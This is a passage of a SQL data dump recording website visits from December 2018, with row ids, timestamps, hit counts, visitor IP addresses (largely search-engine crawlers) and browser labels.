157','chrome'),(347450,1544162088,1,1,0,0,'54.36.148.62','other'),(347451,1544162286,1,1,0,0,'178.154.244.29','other'),(347452,1544162290,1,1,0,0,'178.154.244.11','other'),(347453,1544162291,1,1,0,0,'5.45.207.79','other'),(347454,1544162649,1,1,0,0,'54.36.148.251','other'),(347455,1544162706,1,1,0,0,'54.36.149.85','other'),(347456,1544162713,1,1,0,0,'54.36.148.13','other'),(347457,1544163052,1,1,0,0,'157.55.39.76','other'),(347458,1544163328,1,1,0,0,'40.77.167.3','other'),(347459,1544163511,1,1,0,0,'46.229.168.133','other'),(347460,1544163919,1,1,0,0,'157.55.39.153','other'),(347461,1544164019,2,2,0,0,'54.186.197.62','chrome'),(347462,1544164119,1,1,0,0,'54.36.149.40','other'),(347463,1544164196,1,1,0,0,'8.29.198.26','other'),(347464,1544164765,1,1,0,0,'207.46.13.5','other'),(347465,1544164836,1,1,0,0,'54.36.148.150','other'),(347466,1544165459,1,1,0,0,'46.229.168.151','other'),(347467,1544165543,1,1,0,0,'5.45.207.79','other'),(347468,1544165577,1,1,0,0,'54.36.148.98','other'),(347469,1544165802,1,1,0,0,'157.55.39.76','other'),(347470,1544165837,1,1,0,0,'54.36.149.54','other'),(347471,1544165945,2,2,0,0,'54.36.149.18','other'),(347472,1544165977,1,1,0,0,'46.229.168.129','other'),(347473,1544166035,1,1,0,0,'178.154.244.11','other'),(347474,1544166111,2,2,0,0,'8.29.198.27','other'),(347475,1544166642,2,2,0,0,'91.209.11.236','other'),(347476,1544166753,1,1,0,0,'54.36.149.31','other'),(347477,1544166823,1,1,0,0,'54.36.148.97','other'),(347478,1544166852,1,0,1,0,'66.249.66.157',''),(347479,1544166855,1,0,1,0,'66.249.66.154',''),(347480,1544167056,1,1,0,0,'46.229.168.132','other'),(347481,1544167061,1,1,0,0,'46.229.168.138','other'),(347482,1544167244,1,0,1,0,'66.249.66.59',''),(347483,1544167245,1,0,1,0,'66.249.66.42',''),(347484,1544167412,1,1,0,0,'54.36.148.48','other'),(347485,1544167482,1,1,0,0,'54.36.149.26','other'),(347486,1544167584,5,5,0,0,'178.154.244.29','other'),(347487,1544167684,2,2,0,0,'159.224.64.177','firefox'),(347488,1544167707,1,1,0,0,'54.36.148.20','other'),(347489,1544167982,4,4,0,0,'178.154.244.11','other'),(347490,1544167986,3,3,0,0,'5.45.207.79','other'),(347491,1544168020,1,1,0,0,'54.36.148.67','other'),(347492,1544168138,2,2,0,0,'5.45.207.19','other'),(347493,1544168501,7,7,0,0,'178.154.244.29','other'),(347494,1544168576,1,1,0,0,'54.36.149.5','other'),(347495,1544168634,1,1,0,0,'207.46.13.5','other'),(347496,1544168663,2,2,0,0,'91.196.178.94','chrome'),(347497,1544168712,1,1,0,0,'54.36.149.12','other'),(347498,1544168981,1,1,0,0,'40.77.167.3','other'),(347499,1544169238,2,2,0,0,'178.154.244.11','other'),(347500,1544169426,4,4,0,0,'178.154.244.29','other'),(347501,1544169877,2,2,0,0,'91.196.178.74','firefox'),(347502,1544170047,2,2,0,0,'5.45.207.79','other'),(347503,1544170108,3,3,0,0,'207.46.13.5','other'),(347504,1544170219,2,2,0,0,'178.154.244.11','other'),(347505,1544170477,1,1,0,0,'46.229.168.141','other'),(347506,1544170492,2,2,0,0,'46.229.168.146','other'),(347507,1544171361,2,2,0,0,'95.132.28.237','chrome'),(347508,1544171460,1,1,0,0,'46.229.168.141','other'),(347509,1544171796,1,1,0,0,'54.36.148.67','other'),(347510,1544171892,1,1,0,0,'207.46.13.5','other'),(347511,1544172098,2,2,0,0,'37.53.90.175','chrome'),(347512,1544172246,1,1,0,0,'91.196.178.74','firefox'),(347513,1544172594,1,1,0,0,'54.36.148.135','other'),(347514,1544172731,1,1,0,0,'128.69.199.118','msie'),(347515,1544172733,1,1,0,0,'95.28.61.133','msie'),(347516,1544172766,1,1,0,0,'157.55.39.153','other'),(347517,1544172843,2,2,0,0,'46.133.87.99','chrome'),(347518,1544173115,1,1,0,0,'37.53.90.175','chrome'),(347519,1544173274,1,1,0,0,'46.229.168.142','other'),(347520,1544173387,1,1,0,0,'54.36.148.188','other'),(347521,1544173422,1,1,0,0,'91.196.178.74','firefox'),(347522,1544173473,1,1,0,0,'46.229.168.147','other'),(347523,1544173478,1,1,0,0,'46.229.168.135','other'),(347524,1544173553,1,1,0,0,'54.36.148.250','other'),(347525,1544173582,1,1,0,0,'40.77.167.3','other'),(347526,1544173646,1,1,0,0,'54.36.148.26','other'),(347527,1544173782,1,1,0,0,'46.229.168.143','other'),(347528,1544174515,1,1,0,0,'46.229.168.146','other'),(347529,1544174707,1,1,0,0,'46.229.168.151','other'),(347530,1544174711,2,2,0,0,'46.229.168.132','other'),(347531,1544175043,1,1,0,0,'8.29.198.25','other'),(347532,1544175277,1,1,0,0,'54.36.148.114','other'),(347533,1544175289,1,1,0,0,'46.229.168.137','other'),(347534,1544175558,1,1,0,0,'54.36.149.71','other'),(347535,1544175829,1,1,0,0,'54.36.148.198','other'),(347536,1544175838,1,1,0,0,'46.229.168.143','other'),(347537,1544176395,1,1,0,0,'46.229.168.148','other'),(347538,1544176928,1,1,0,0,'157.55.39.76','other'),(347539,1544176956,1,1,0,0,'8.29.198.25','other'),(347540,1544177038,1,1,0,0,'8.29.198.26','other'),(347541,1544177068,1,1,0,0,'54.36.148.243','other'),(347542,1544177180,1,1,0,0,'91.196.178.170','chrome'),(347543,1544177216,1,1,0,0,'54.36.148.166','other'),(347544,1544177267,1,1,0,0,'46.229.168.153','other'),(347545,1544177952,2,2,0,0,'54.165.59.7','other'),(347546,1544178210,1,1,0,0,'54.36.148.196','other'),(347547,1544178407,3,3,0,0,'91.196.177.15','other'),(347548,1544178777,1,1,0,0,'54.36.148.57','other'),(347549,1544179574,1,1,0,0,'207.46.13.5','other'),(347550,1544180465,2,2,0,0,'130.180.219.244','chrome'),(347551,1544180523,1,1,0,0,'178.95.246.220','chrome'),(347552,1544180558,3,3,0,0,'92.113.127.58','chrome'),(347553,1544180783,1,1,0,0,'178.54.57.97','firefox'),(347554,1544180955,1,1,0,0,'195.24.154.186','firefox'),(347555,1544181062,6,6,0,0,'178.154.244.29','other'),(347556,1544181068,2,2,0,0,'40.77.167.3','other'),(347557,1544181088,2,2,0,0,'91.209.11.236','other'),(347558,1544181100,1,1,0,0,'157.55.39.76','other'),(347559,1544181191,1,1,0,0,'46.229.168.153','other'),(347560,1544181194,1,1,0,0,'46.229.168.154','other'),(347561,1544181293,6,6,0,0,'178.154.244.11','other'),(347562,1544181356,1,1,0,0,'54.36.148.133','other'),(347563,1544181397,1,1,0,0,'207.46.13.5','other'),(347564,1544181405,2,2,0,0,'157.55.39.153','other'),(347565,1544181611,3,3,0,0,'5.45.207.79','other'),(347566,1544182130,1,1,0,0,'209.17.96.218','other'),(347567,1544182142,1,1,0,0,'54.36.149.50','other'),(347568,1544182260,9,9,0,0,'178.154.244.29','other'),(347569,1544182288,4,4,0,0,'178.154.244.11','other'),(347570,1544182336,3,3,0,0,'5.45.207.19','other'),(347571,1544182593,1,1,0,0,'54.36.148.142','other'),(347572,1544182691,2,2,0,0,'5.45.207.79','other'),(347573,1544182968,1,1,0,0,'66.102.9.40','chrome'),(347574,1544182969,1,1,0,0,'66.102.9.58','chrome'),(347575,1544182979,1,1,0,0,'91.196.177.165','chrome'),(347576,1544183351,5,5,0,0,'178.154.244.29','other'),(347577,1544183505,1,1,0,0,'178.154.244.11','other'),(347578,1544184161,2,2,0,0,'130.180.219.244','chrome'),(347579,1544184242,1,1,0,0,'54.36.148.77','other'),(347580,1544184473,1,1,0,0,'54.36.148.86','other'),(347581,1544184568,1,1,0,0,'207.46.13.5','other'),(347582,1544184675,2,2,0,0,'46.133.87.99','chrome'),(347583,1544184842,1,1,0,0,'13.57.233.99','chrome'),(347584,1544185204,1,1,0,0,'157.55.39.153','other'),(347585,1544185491,1,1,0,0,'46.229.168.147','other'),(347586,1544185503,1,1,0,0,'54.36.148.201','other'),(347587,1544185512,1,1,0,0,'54.36.148.117','other'),(347588,1544185756,1,1,0,0,'54.36.149.6','other'),(347589,1544185765,1,1,0,0,'54.165.59.7','other'),(347590,1544185899,1,1,0,0,'8.29.198.25','other'),(347591,1544186527,2,2,0,0,'157.55.39.153','other'),(347592,1544186622,1,1,0,0,'40.77.167.3','other'),(347593,1544186987,3,3,0,0,'91.196.177.15','chrome'),(347594,1544187207,1,1,0,0,'54.36.149.44','other'),(347595,1544187226,1,1,0,0,'54.36.149.22','other'),(347596,1544187287,1,1,0,0,'54.36.148.147','other'),(347597,1544187340,1,1,0,0,'207.46.13.5','other'),(347598,1544187435,1,1,0,0,'46.229.168.143','other'),(347599,1544187580,1,1,0,0,'54.36.148.36','other'),(347600,1544187824,2,2,0,0,'8.29.198.26','other'),(347601,1544188139,1,1,0,0,'54.36.148.255','other'),(347602,1544188176,1,1,0,0,'157.55.39.153','other'),(347603,1544188392,3,3,0,0,'91.196.178.175','chrome'),(347604,1544188488,1,1,0,0,'54.36.148.134','other'),(347605,1544189000,1,1,0,0,'54.36.149.79','other'),(347606,1544189640,1,1,0,0,'54.36.148.22','other'),(347607,1544190422,1,1,0,0,'54.36.148.79','other'),(347608,1544190462,1,1,0,0,'178.255.215.94','other'),(347609,1544190490,1,1,0,0,'91.196.177.15','chrome'),(347610,1544190566,1,1,0,0,'46.229.168.150','other'),(347611,1544190708,2,2,0,0,'157.55.39.76','other'),(347612,1544191062,4,4,0,0,'178.154.244.29','other'),(347613,1544191094,1,1,0,0,'54.36.148.147','other'),(347614,1544191233,1,1,0,0,'54.36.148.223','other'),(347615,1544191336,1,1,0,0,'5.45.207.19','other'),(347616,1544191337,2,2,0,0,'40.77.167.3','other'),(347617,1544191542,1,1,0,0,'46.229.168.154','other'),(347618,1544191607,1,1,0,0,'54.36.148.121','other'),(347619,1544191688,1,1,0,0,'46.229.168.152','other'),(347620,1544191690,1,1,0,0,'46.229.168.146','other'),(347621,1544191771,1,1,0,0,'54.36.148.48','other'),(347622,1544191796,1,1,0,0,'91.196.177.15','chrome'),(347623,1544191846,1,1,0,0,'54.36.148.232','other'),(347624,1544192176,6,6,0,0,'159.65.24.22','chrome'),(347625,1544193012,1,1,0,0,'54.36.148.57','other'),(347626,1544193252,1,1,0,0,'54.36.149.80','other'),(347627,1544193264,2,2,0,0,'207.46.13.5','other'),(347628,1544193382,1,1,0,0,'5.45.207.79','other'),(347629,1544193421,1,1,0,0,'54.36.149.70','other'),(347630,1544193460,1,1,0,0,'95.108.213.4','other'),(347631,1544193519,2,2,0,0,'46.133.87.99','chrome'),(347632,1544193702,1,1,0,0,'95.163.255.62','other'),(347633,1544193703,1,1,0,0,'95.163.255.66','other'),(347634,1544193706,2,2,0,0,'95.163.255.67','other'),(347635,1544193959,1,1,0,0,'54.36.148.180','other'),(347636,1544194045,1,1,0,0,'54.36.149.20','other'),(347637,1544194131,1,1,0,0,'54.36.149.35','other'),(347638,1544194381,1,1,0,0,'40.77.167.189','other'),(347639,1544194480,1,1,0,0,'54.36.149.56','other'),(347640,1544194506,1,1,0,0,'46.229.168.151','other'),(347641,1544194883,1,1,0,0,'46.229.168.148','other'),(347642,1544195132,1,1,0,0,'54.36.148.128','other'),(347643,1544195565,2,2,0,0,'40.77.167.3','other'),(347644,1544196124,1,1,0,0,'157.55.39.153','other'),(347645,1544196687,1,1,0,0,'178.154.244.11','other'),(347646,1544196693,1,1,0,0,'46.229.168.137','other'),(347647,1544196695,1,1,0,0,'46.229.168.153','other'),(347648,1544196736,1,1,0,0,'8.29.198.25','other'),(347649,1544196788,1,1,0,0,'157.55.39.76','other'),(347650,1544197023,1,1,0,0,'46.229.168.142','other'),(347651,1544197025,1,1,0,0,'46.229.168.135','other'),(347652,1544197585,1,1,0,0,'54.36.148.36','other'),(347653,1544197977,1,1,0,0,'54.36.148.204','other'),(347654,1544198051,1,1,0,0,'157.55.39.76','other'),(347655,1544198085,1,1,0,0,'54.36.148.180','other'),(347656,1544198313,9,9,0,0,'178.154.244.29','other'),(347657,1544198314,1,1,0,0,'54.36.149.58','other'),(347658,1544198327,3,3,0,0,'5.45.207.79','other'),(347659,1544198388,1,1,0,0,'40.77.167.3','other'),(347660,1544198484,2,2,0,0,'91.196.178.84','firefox'),(347661,1544198488,1,1,0,0,'54.36.149.55','other'),(347662,1544198643,6,6,0,0,'178.154.244.11','other'),(347663,1544198645,1,1,0,0,'54.36.148.236','other'),(347664,1544198680,2,2,0,0,'8.29.198.26','other'),(347665,1544198818,1,1,0,0,'207.46.13.5','other'),(347666,1544198834,1,1,0,0,'40.77.167.189','other'),(347667,1544198915,1,1,0,0,'5.45.207.19','other'),(347668,1544199031,1,1,0,0,'54.36.148.132','other'),(347669,1544199035,1,1,0,0,'46.229.168.146','other'),(347670,1544199201,1,1,0,0,'180.76.15.11','other'),(347671,1544199203,1,1,0,0,'180.76.15.158','other'),(347672,1544199225,1,1,0,0,'54.36.149.84','other'),(347673,1544199919,2,2,0,0,'207.46.13.5','other'),(347674,1544200092,1,1,0,0,'40.77.167.3','other'),(347675,1544200096,1,1,0,0,'178.154.244.29','other'),(347676,1544200127,1,1,0,0,'46.229.168.138','other'),(347677,1544200166,1,1,0,0,'54.36.149.31','other'),(347678,1544200275,1,1,0,0,'46.229.168.144','other'),(347679,1544200296,1,1,0,0,'54.36.149.95','other'),(347680,1544200521,1,1,0,0,'54.36.148.148','other'),(347681,1544200967,1,1,0,0,'46.229.168.129','other'),(347682,1544202337,1,1,0,0,'54.36.148.118','other'),(347683,1544202405,1,1,0,0,'157.55.39.76','other'),(347684,1544203023,1,1,0,0,'54.36.148.248','other'),(347685,1544203778,1,1,0,0,'207.46.13.5','other'),(347686,1544203994,2,2,0,0,'40.77.167.3','other'),(347687,1544203996,1,1,0,0,'95.163.255.107','other'),(347688,1544204350,1,1,0,0,'54.36.148.168','other'),(347689,1544204493,1,1,0,0,'54.36.149.64','other'),(347690,1544204496,2,2,0,0,'95.163.255.103','other'),(347691,1544204783,1,1,0,0,'54.36.148.225','other'),(347692,1544205026,2,2,0,0,'46.33.49.91','chrome'),(347693,1544205262,1,1,0,0,'46.229.168.145','other'),(347694,1544205312,1,1,0,0,'91.196.178.186','chrome'),(347695,1544205438,1,1,0,0,'95.163.255.104','other'),(347696,1544205710,1,1,0,0,'54.36.148.160','other'),(347697,1544205788,1,1,0,0,'95.163.255.114','other'),(347698,1544206115,1,1,0,0,'95.163.255.109','other'),(347699,1544206223,1,1,0,0,'54.36.149.14','other'),(347700,1544206446,1,1,0,0,'95.163.255.112','other'),(347701,1544206767,1,1,0,0,'95.163.255.105','other'),(347702,1544206858,1,1,0,0,'95.163.255.114','other'),(347703,1544206955,1,1,0,0,'95.163.255.104','other'),(347704,1544207068,1,1,0,0,'207.46.13.5','other'),(347705,1544207108,1,1,0,0,'54.36.148.173','other'),(347706,1544207132,1,1,0,0,'178.154.244.11','other'),(347708,1544207133,1,1,0,0,'5.45.207.79','other'),(347709,1544207134,1,1,0,0,'178.154.244.29','other'),(347710,1544207388,1,1,0,0,'54.36.148.135','other'),(347711,1544207587,1,1,0,0,'8.29.198.26','other'),(347712,1544207934,1,1,0,0,'54.36.148.233','other'),(347713,1544208326,1,1,0,0,'54.36.148.235','other'),(347714,1544208355,1,1,0,0,'157.55.39.153','other'),(347715,1544208608,1,1,0,0,'46.229.168.138','other'),(347716,1544208649,1,1,0,0,'46.229.168.153','other'),(347717,1544208749,1,1,0,0,'54.36.149.73','other'),(347718,1544209532,2,2,0,0,'8.29.198.25','other'),(347719,1544209586,1,1,0,0,'54.36.148.248','other'),(347720,1544209674,1,1,0,0,'178.154.244.29','other'),(347721,1544209811,1,1,0,0,'54.36.148.47','other'),(347722,1544210462,1,0,1,0,'66.249.69.217',''),(347723,1544210474,1,1,0,0,'157.55.39.76','other'),(347724,1544210512,1,0,1,0,'66.249.69.200',''),(347725,1544210618,6,6,0,0,'178.154.244.29','other'),(347726,1544210686,2,2,0,0,'46.211.24.225','chrome'),(347727,1544210710,5,5,0,0,'178.154.244.11','other'),(347728,1544210878,1,1,0,0,'46.229.168.142','other'),(347729,1544210939,1,1,0,0,'54.36.149.81','other'),(347730,1544211034,2,2,0,0,'5.45.207.79','other'),(347731,1544211099,2,2,0,0,'5.45.207.19','other'),(347732,1544211181,1,1,0,0,'46.229.168.147','other'),(347733,1544211281,1,1,0,0,'54.36.148.180','other'),(347734,1544211312,1,1,0,0,'54.36.148.98','other'),(347735,1544211420,1,1,0,0,'87.250.224.65','other'),(347736,1544211546,5,5,0,0,'178.154.244.29','other'),(347737,1544211559,2,2,0,0,'82.145.209.42','other'),(347738,1544211671,1,1,0,0,'66.249.75.17','chrome'),(347739,1544211688,1,1,0,0,'66.249.75.21','chrome'),(347740,1544211695,1,1,0,0,'87.250.224.47','other'),(347741,1544211698,2,2,0,0,'91.196.178.55','chrome'),(347742,1544211786,2,2,0,0,'157.55.39.153','other'),(347743,1544211792,1,1,0,0,'66.249.69.217','chrome'),(347744,1544211793,1,1,0,0,'54.36.149.70','other'),(347745,1544211809,1,1,0,0,'66.249.69.200','chrome'),(347746,1544211898,1,1,0,0,'95.163.255.119','other'),(347747,1544211934,1,1,0,0,'95.163.255.106','other'),(347748,1544211938,1,1,0,0,'207.46.13.5','other'),(347749,1544211968,1,1,0,0,'95.163.255.104','other'),(347750,1544212008,1,1,0,0,'95.163.255.116','other'),(347751,1544212054,1,1,0,0,'95.163.255.113','other'),(347752,1544212096,1,1,0,0,'95.163.255.107','other'),(347753,1544212116,2,2,0,0,'5.45.207.79','other'),(347754,1544212186,2,2,0,0,'178.154.244.11','other'),(347755,1544212191,1,1,0,0,'54.36.148.141','other'),(347756,1544212205,2,2,0,0,'95.108.213.4','other'),(347757,1544212221,2,2,0,0,'5.45.207.19','other'),(347758,1544212271,1,1,0,0,'178.154.244.49','other'),(347759,1544212338,2,2,0,0,'213.180.203.48','other'),(347760,1544212683,1,1,0,0,'178.154.244.29','other'),(347761,1544212689,2,2,0,0,'37.9.113.20','other'),(347762,1544212929,1,1,0,0,'87.250.224.65','other'),(347763,1544212931,1,1,0,0,'141.8.142.191','other'),(347764,1544212933,1,1,0,0,'66.249.75.15','chrome'),(347765,1544212935,2,2,0,0,'66.249.75.21','chrome'),(347766,1544213265,1,1,0,0,'66.249.75.17','chrome'),(347767,1544213297,1,1,0,0,'66.249.75.20','chrome'),(347768,1544213467,1,1,0,0,'157.55.39.153','other'),(347769,1544213472,1,1,0,0,'207.46.13.5','other'),(347770,1544213505,1,1,0,0,'46.229.168.134','other'),(347771,1544213712,1,1,0,0,'54.36.148.193','other'),(347772,1544213876,2,2,0,0,'66.249.75.21','chrome'),(347773,1544213920,2,2,0,0,'66.249.75.22','chrome'),(347774,1544214253,1,1,0,0,'66.249.75.20','chrome'),(347775,1544214338,1,1,0,0,'46.229.168.140','other'),(347776,1544214434,1,1,0,0,'157.55.39.153','other'),(347777,1544214452,1,1,0,0,'66.249.69.204','chrome'),(347778,1544214596,1,1,0,0,'54.36.148.97','other'),(347779,1544215036,1,1,0,0,'178.154.244.11','other'),(347780,1544215039,1,1,0,0,'37.9.113.148','other'),(347781,1544215047,1,1,0,0,'5.45.207.8','other'),(347782,1544215050,1,1,0,0,'5.255.253.38','other'),(347783,1544215095,1,1,0,0,'207.46.13.5','other'),(347784,1544215583,1,1,0,0,'66.249.75.16','chrome'),(347785,1544215584,1,1,0,0,'66.249.75.20','chrome'),(347786,1544215978,1,1,0,0,'54.36.149.7','other'),(347787,1544216080,2,2,0,0,'66.249.75.17','chrome'),(347788,1544216102,1,1,0,0,'66.249.75.22','chrome'),(347789,1544216294,1,1,0,0,'54.36.148.29','other'),(347790,1544216497,1,1,0,0,'54.36.148.227','other'),(347791,1544216734,1,1,0,0,'66.249.75.20','chrome'),(347792,1544216877,1,1,0,0,'46.229.168.152','other'),(347793,1544216878,1,1,0,0,'54.36.149.85','other'),(347794,1544216998,1,1,0,0,'54.36.148.205','other'),(347795,1544217050,1,1,0,0,'54.36.148.206','other'),(347796,1544218434,1,1,0,0,'46.229.168.137','other'),(347797,1544218436,1,1,0,0,'8.29.198.26','other'),(347798,1544218554,1,1,0,0,'46.229.168.135','other'),(347799,1544218702,1,1,0,0,'54.36.148.145','other'),(347800,1544218818,2,2,0,0,'66.249.75.17','chrome'),(347801,1544218821,1,1,0,0,'66.249.75.21','chrome'),(347802,1544218991,1,1,0,0,'54.36.148.41','other'),(347803,1544219028,1,1,0,0,'54.36.148.96','other'),(347804,1544219130,1,1,0,0,'40.77.167.3','other'),(347805,1544219355,1,1,0,0,'157.55.39.76','other'),(347806,1544219438,2,2,0,0,'66.249.75.22','chrome'),(347807,1544219468,1,1,0,0,'54.36.148.165','other'),(347808,1544219642,2,2,0,0,'66.249.69.202','chrome'),(347809,1544219763,1,1,0,0,'54.36.148.164','other'),(347810,1544220052,2,2,0,0,'66.249.75.20','chrome'),(347811,1544220173,1,1,0,0,'54.36.148.55','other'),(347812,1544220271,1,1,0,0,'207.46.13.5','other'),(347813,1544220372,1,1,0,0,'54.36.148.100','other'),(347814,1544220386,1,1,0,0,'8.29.198.25','other'),(347815,1544220394,1,1,0,0,'8.29.198.27','other'),(347816,1544220504,1,1,0,0,'66.249.75.17','chrome'),(347817,1544220560,1,1,0,0,'95.163.255.92','other'),(347818,1544220564,1,1,0,0,'95.163.255.96','other'),(347819,1544220702,1,1,0,0,'54.36.148.172','other'),(347820,1544220780,1,1,0,0,'5.188.210.53','chrome'),(347821,1544220795,1,1,0,0,'66.249.69.219','chrome'),(347822,1544220796,2,2,0,0,'66.249.69.202','chrome'),(347823,1544220975,1,1,0,0,'54.36.148.226','other'),(347824,1544221036,2,2,0,0,'46.229.168.130','other'),(347825,1544221241,1,1,0,0,'180.76.15.32','other'),(347826,1544221356,1,1,0,0,'207.46.13.5','other'),(347827,1544221447,1,1,0,0,'46.229.168.154','other'),(347828,1544221504,1,1,0,0,'54.36.149.24','other'),(347829,1544221514,2,2,0,0,'66.249.75.21','chrome'),(347830,1544221538,1,1,0,0,'66.249.69.217','chrome'),(347831,1544221557,2,2,0,0,'46.229.168.136','other'),(347832,1544221766,1,1,0,0,'66.249.75.17','chrome'),(347833,1544221778,1,1,0,0,'54.36.148.75','other'),(347834,1544221843,1,1,0,0,'66.249.75.22','chrome'),(347835,1544221963,2,2,0,0,'40.77.167.138','other'),(347836,1544222041,1,1,0,0,'54.36.149.4','other'),(347837,1544222209,1,1,0,0,'54.36.148.189','other'),(347838,1544222841,1,1,0,0,'46.229.168.147','other'),(347839,1544222937,1,1,0,0,'46.229.168.139','other'),(347840,1544223305,2,2,0,0,'5.164.140.29','chrome'),(347841,1544223647,1,1,0,0,'54.36.149.79','other'),(347842,1544224227,2,2,0,0,'40.77.167.140','other'),(347843,1544224847,1,1,0,0,'54.36.148.32','other'),(347844,1544225074,1,1,0,0,'66.249.75.22','chrome'),(347845,1544225321,2,2,0,0,'40.77.167.138','other'),(347846,1544225603,1,1,0,0,'46.229.168.141','other'),(347847,1544225886,1,1,0,0,'46.229.168.140','other'),(347848,1544226116,1,1,0,0,'66.249.75.17','chrome'),(347849,1544226117,1,1,0,0,'66.249.75.22','chrome'),(347850,1544226127,1,1,0,0,'178.154.244.11','other'),(347851,1544226296,1,1,0,0,'178.154.244.29','other'),(347852,1544226439,1,1,0,0,'66.249.69.200','chrome'),(347853,1544226541,1,1,0,0,'5.188.210.53','chrome'),(347854,1544226657,1,1,0,0,'66.249.75.16','chrome'),(347855,1544226668,2,2,0,0,'66.249.75.21','chrome'),(347856,1544226697,2,2,0,0,'66.249.75.15','chrome'),(347857,1544226722,1,1,0,0,'66.249.75.20','chrome'),(347858,1544226915,1,1,0,0,'66.249.69.217','chrome'),(347859,1544227031,1,1,0,0,'54.36.149.103','other'),(347860,1544227125,1,1,0,0,'66.249.75.22','chrome'),(347861,1544227353,1,1,0,0,'54.36.148.31','other'),(347862,1544227443,1,1,0,0,'54.36.148.205','other'),(347863,1544227551,1,1,0,0,'54.36.149.2','other'),(347864,1544227850,1,1,0,0,'40.77.167.139','other'),(347865,1544227911,4,4,0,0,'178.154.244.29','other'),(347866,1544228035,1,1,0,0,'40.77.167.137','other'),(347867,1544228046,1,1,0,0,'54.36.148.214','other'),(347868,1544228204,1,1,0,0,'46.229.168.135','other'),(347869,1544228208,1,1,0,0,'46.229.168.139','other'),(347870,1544228270,1,1,0,0,'66.249.75.15','chrome'),(347871,1544228293,1,1,0,0,'66.249.75.22','chrome'),(347872,1544228304,1,1,0,0,'66.249.75.20','chrome'),(347873,1544228345,1,1,0,0,'66.249.69.219','chrome'),(347874,1544228357,1,1,0,0,'66.249.69.202','chrome'),(347875,1544228389,1,1,0,0,'54.36.148.82','other'),(347876,1544228629,1,1,0,0,'209.17.97.42','other'),(347877,1544228660,1,1,0,0,'54.36.148.16','other'),(347878,1544228675,1,1,0,0,'178.255.215.94','other'),(347879,1544228676,1,1,0,0,'54.36.148.173','other'),(347880,1544228818,1,1,0,0,'87.250.224.47','other'),(347881,1544228913,1,1,0,0,'5.45.207.19','other'),(347882,1544228924,2,2,0,0,'178.154.244.29','other'),(347883,1544228944,3,3,0,0,'178.154.244.11','other'),(347884,1544229080,2,2,0,0,'66.249.69.204','chrome'),(347885,1544229093,1,1,0,0,'5.45.207.79','other'),(347886,1544229280,1,1,0,0,'8.29.198.27','other'),(347887,1544229551,1,1,0,0,'54.36.148.254','other'),(347888,1544229611,1,1,0,0,'66.249.69.219','chrome'),(347889,1544229877,1,1,0,0,'40.77.167.137','other'),(347890,1544230175,1,1,0,0,'66.249.75.16','chrome'),(347891,1544230176,2,2,0,0,'66.249.75.22','chrome'),(347892,1544230210,2,2,0,0,'66.249.69.202','chrome'),(347893,1544230496,1,1,0,0,'157.55.39.85','other'),(347894,1544230574,1,1,0,0,'31.131.2.19','other'),(347895,1544230575,1,1,0,0,'54.36.148.22','other'),(347896,1544230735,2,2,0,0,'66.249.75.20','chrome'),(347897,1544230767,1,1,0,0,'66.249.69.200','chrome'),(347898,1544231020,1,1,0,0,'54.36.148.108','other'),(347899,1544231025,1,1,0,0,'66.249.69.221','chrome'),(347900,1544231053,1,1,0,0,'54.36.148.113','other'),(347901,1544231090,1,1,0,0,'5.45.207.19','other'),(347902,1544231160,1,1,0,0,'209.17.97.90','other'),(347903,1544231167,1,1,0,0,'51.255.65.46','other'),(347904,1544231229,1,1,0,0,'8.29.198.25','other'),(347905,1544231239,1,1,0,0,'8.29.198.26','other'),(347906,1544231744,1,1,0,0,'46.229.168.151','other'),(347907,1544231763,1,1,0,0,'66.249.75.16','chrome'),(347908,1544231791,1,1,0,0,'66.249.75.20','chrome'),(347909,1544231801,1,1,0,0,'54.36.148.36','other'),(347910,1544231908,1,1,0,0,'54.36.148.229','other'),(347911,1544232049,1,1,0,0,'46.229.168.145','other'),(347912,1544232142,1,1,0,0,'54.36.148.24','other'),(347913,1544232533,1,1,0,0,'66.249.69.200','chrome'),(347914,1544232667,1,1,0,0,'40.77.167.139','other'),(347915,1544232764,1,1,0,0,'91.196.178.131','chrome'),(347916,1544232889,1,1,0,0,'95.163.255.185','other'),(347917,1544232936,1,1,0,0,'95.163.255.194','other'),(347918,1544233234,1,1,0,0,'66.249.75.22','chrome'),(347919,1544233236,1,1,0,0,'66.249.69.217','chrome'),(347921,1544233374,1,1,0,0,'46.229.168.143','other'),(347922,1544233377,1,1,0,0,'46.229.168.152','other'),(347923,1544233760,1,1,0,0,'66.249.75.21','chrome'),(347924,1544233844,1,1,0,0,'40.77.167.137','other'),(347925,1544233935,1,1,0,0,'91.196.178.131','chrome'),(347926,1544234696,1,1,0,0,'54.36.149.12','other'),(347927,1544234741,1,1,0,0,'54.36.149.84','other'),(347928,1544234883,2,2,0,0,'66.249.75.20','chrome'),(347929,1544234904,1,1,0,0,'54.36.148.47','other'),(347930,1544234906,1,1,0,0,'54.36.148.115','other'),(347931,1544234955,1,1,0,0,'66.249.69.204','chrome'),(347932,1544235236,1,1,0,0,'66.249.75.21','chrome'),(347933,1544235296,3,3,0,0,'40.77.167.137','other'),(347934,1544235299,6,6,0,0,'40.77.167.139','other'),(347935,1544235337,6,6,0,0,'40.77.167.74','other'),(347936,1544235361,1,1,0,0,'66.249.75.22','chrome'),(347937,1544235443,1,1,0,0,'178.154.244.11','other'),(347938,1544235921,3,3,0,0,'207.46.13.10','other'),(347939,1544236250,1,1,0,0,'66.249.75.17','chrome'),(347940,1544236251,2,2,0,0,'66.249.75.20','chrome'),(347941,1544236260,2,2,0,0,'91.213.59.174','firefox'),(347942,1544236368,1,1,0,0,'40.77.167.137','other'),(347943,1544236814,1,1,0,0,'54.36.148.10','other'),(347944,1544236909,1,1,0,0,'66.249.75.16','chrome'),(347945,1544237019,1,1,0,0,'54.36.149.72','other'),(347946,1544237106,1,1,0,0,'46.229.168.140','other'),(347947,1544237171,1,1,0,0,'54.36.148.57','other'),(347948,1544237303,1,1,0,0,'54.36.148.198','other'),(347949,1544237649,1,1,0,0,'40.77.167.74','other'),(347950,1544237730,1,1,0,0,'66.249.75.22','chrome'),(347951,1544237746,1,1,0,0,'46.229.168.138','other'),(347952,1544237750,1,1,0,0,'46.229.168.133','other'),(347953,1544237971,1,1,0,0,'46.229.168.151','other'),(347954,1544238017,1,1,0,0,'54.36.148.205','other'),(347955,1544238098,1,1,0,0,'54.36.148.189','other'),(347956,1544238177,1,1,0,0,'40.77.167.137','other'),(347957,1544238429,1,1,0,0,'54.36.148.240','other'),(347958,1544238853,1,1,0,0,'54.36.148.11','other'),(347959,1544238897,1,1,0,0,'54.36.148.117','other'),(347960,1544238962,1,1,0,0,'66.249.69.202','chrome'),(347961,1544239075,1,1,0,0,'66.249.69.